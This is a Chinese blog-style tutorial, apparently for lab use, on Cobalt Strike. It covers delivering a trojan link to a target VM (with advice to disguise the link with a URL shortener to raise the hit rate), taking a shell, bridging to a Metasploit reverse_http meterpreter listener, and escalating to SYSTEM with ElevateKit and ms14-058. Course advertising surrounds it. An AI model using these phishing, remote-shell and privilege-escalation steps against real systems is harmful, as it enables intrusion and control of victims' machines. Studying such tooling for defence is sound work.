2024年Cobalt Strike渗透神器详解(1),2024年最新腾讯字节等大厂面试真题汇总

一、网安学习成长路线图

网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。
在这里插入图片描述

二、网安视频合集

观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
在这里插入图片描述

三、精品网安学习书籍

当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。
在这里插入图片描述

四、网络安全源码合集+工具包

光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这时候可以搞点实战案例来学习。
在这里插入图片描述

五、网络安全面试题

最后就是大家最关心的网络安全面试题板块
在这里插入图片描述在这里插入图片描述

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

在这里插入图片描述
在这里插入图片描述

  • 复制生成的链接;(注:小提一嘴,一般情况下直接发送链接很容易被识破,我们可以使用短链接生成器生成一个短链接,接着配合一些图片或页面,这样可以大大提高命中率,由于只是测试这里就不演示了哟,也是提供一个思路或方法

在这里插入图片描述

  • 将该恶意链接发送至目标靶机,当靶机用户访问时即会下载该木马文件;(注:需要关闭防火墙,杀毒软件等)

在这里插入图片描述

成功拿到shell
  • 假设靶机用户比较好奇,无意中点击执行了该恶意文件,返回到CS中可以看到目标已成功上线;

在这里插入图片描述

  • 拿到shell该怎么执行命令呢?别急别急,这就来了;

在这里插入图片描述

#查看IP信息
shell ipconfig
#查看用户
net user

在这里插入图片描述

  • 执行desktop命令,还可看到靶机用户桌面实时情况;

在这里插入图片描述

CS如何联动MSF

所需环境

攻击机(kali)
目标靶机(win 10)

前提条件
  • 必须确保目标靶机已成功上线,这里就不一一演示了哟;

在这里插入图片描述

MSF配置监听模块
  • kali打开msfconsole;

在这里插入图片描述

  • 设置模块,配置payload信息并执行攻击;
#使用监听模块
use exploit/multi/handler
#配置payload
set payload windows/meterpreter/reverse_http
#配置IP和端口
set lhost kali-ip
set lport 端口
#开始攻击
run/exploit

在这里插入图片描述

CS新建监听器
  • 在CS中新建一个监听器;

在这里插入图片描述

  • 配置一下基础的信息,值得注意的是IP和端口必须和msf监听的一致;

在这里插入图片描述

成功交互
  • 右击后点击Interact进入命令模式;

在这里插入图片描述

  • 接着点击Spawn添加,选择刚配置的监听payload;

在这里插入图片描述
在这里插入图片描述

  • 等待命令执行完即可;

在这里插入图片描述

  • 返回msf发现监听成功,成功进行交互;

在这里插入图片描述

CS如何进行提权操作

所需环境

攻击机(kali)
目标靶机(win 2008 R2)

前提条件
  • 还是必须确保目标靶机已成功上线哟;

在这里插入图片描述

查看用户权限
  • 打开视图命令,发现上线用户为普通用户;

在这里插入图片描述

  • 打开命令模式,执行getuid命令获取用户ID,有点慢稍等一会儿;

在这里插入图片描述

下载提权插件
  • CS里面含有自动化的提权,来到提权模块;

在这里插入图片描述

  • 默认提权的exp就只要下面这两个,肯定是不够的,所以得去加载一些提权的插件;

在这里插入图片描述

  • 下载ElevateKit提权插件;

在这里插入图片描述

  • 由于CS是在kali上,将该插件上传至kali以进行操作;

在这里插入图片描述

加载插件
  • 接下来加载插件,选择脚本管理模块;

在这里插入图片描述

  • 选择上传的插件,点击打开;

在这里插入图片描述

  • 打印出插件路径说明上传成功了;

在这里插入图片描述

  • 再次打开提权模块,发现EXP果然更多了;

在这里插入图片描述
在这里插入图片描述

成功提权
  • 选择好监听的目标和ms14-058EXP后,开始提权;(注:不同的靶机需要用到的提权exp是不一样的,这里的靶机环境为win 2008 R2)
  • 过程也是会比较慢的,等待一会后成功提权至system权限;

在这里插入图片描述

  • 进入命令模式,执行getuid命令查看当前用户成功提升至system权限;

在这里插入图片描述
还有一些其他的提权插件也还不错的,有兴趣可以下载试试;

https://github.com/DeEpinGh0st/Erebus

以上内容就是Cobalt Strike渗透神器的详细使用过程,当然还有很多其他的用法,后续也会慢慢更新喔,如有还不太理解或有其他想法的小伙伴们都可以私信我或评论区打出来哟,如有写的不好的地方也请大家多多包涵一下,我也会慢慢去改进和提高的,请各位小伙伴多多支持,走之前别忘了点个赞哟😁!

CS小福利

关注微信公众号Joker零安全回复CS另附上工具精美礼品一份哟~

免责声明由于传播、利用本博客或微信公众号所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,Joker零安全及博客作者不为此承担任何责任,一旦造成后果请自行承担!

学习路线:

这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不过,要想从脚本小子变成黑客大神,这个方向越往后,需要学习和掌握的东西就会越来越多以下是网络渗透需要学习的内容:
在这里插入图片描述

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

  • 20
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值